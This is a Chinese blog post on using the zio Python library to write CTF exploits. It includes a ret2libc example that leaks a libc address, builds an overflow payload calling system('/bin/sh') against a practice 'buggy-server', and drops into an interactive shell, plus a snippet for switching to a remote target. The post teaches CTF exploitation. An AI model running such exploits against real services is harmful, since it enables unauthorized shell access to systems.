• CTF中的EXP编写技巧 zio库的使用


    zio库没有提供文档

    这个是官方给出的一个例子程序

     1 from zio import *
     2 io = zio('./buggy-server')
     3 # io = zio((pwn.server, 1337))
     4 
     5 for i in xrange(1337):
     6     io.writeline('add ' + str(i))
     7     io.read_until('>>')
     8 
     9 io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa
    info " + "A" * 49 + "
    show
    ")
    10 io.read_until('A' * 49)
    11 libc_base = l32(io.read(4)) - 0x1a9960
    12 libc_system = libc_base + 0x3ea70
    13 libc_binsh = libc_base + 0x15fcbf
    14 payload = 'A' * 64 + l32(libc_system) + 'JJJJ' + l32(libc_binsh)
    15 io.write('info ' + payload + "
    show
    exit
    ")
    16 io.read_until(">>")
    17 # We've got a shell;-)
    18 io.interact()

    可以做本地和远程的切换

     1 from zio import *
     2 
     3 if you_are_debugging_local_server_binary:
     4     io = zio('./buggy-server')            # used for local pwning development
     5 elif you_are_pwning_remote_server:
     6     io = zio(('1.2.3.4', 1337))           # used to exploit remote service
     7 
     8 io.write(your_awesome_ropchain_or_shellcode)
     9 # hey, we got an interactive shell!
    10 io.interact()

    总结一下

    zio (('127.0.0.1',3389), timeout = 9999)

    连接到ip的端口

    zio('./pwn1') 加载本地文件

    writeline('abc') 发送字符串

    write(‘abc') 发送字符串

    read_until('hello') 直到收到字符串

    read(4) 接收

    l32()   4byte

    l64()   8byte

    interact()与shell交互

  • 相关阅读:
    ES6 数值类型常用方法
    阿里云如何发布网站
    常用的网站推荐
    笔记一 sql 基础知识
    笔记一 MVC初识
    基础二 面向对象编程
    基础一
    css reset 样式
    CSS 嵌套绝对定位
    ADO
  • 原文地址:https://www.cnblogs.com/Ox9A82/p/5475815.html
Copyright © 2020-2023  润新知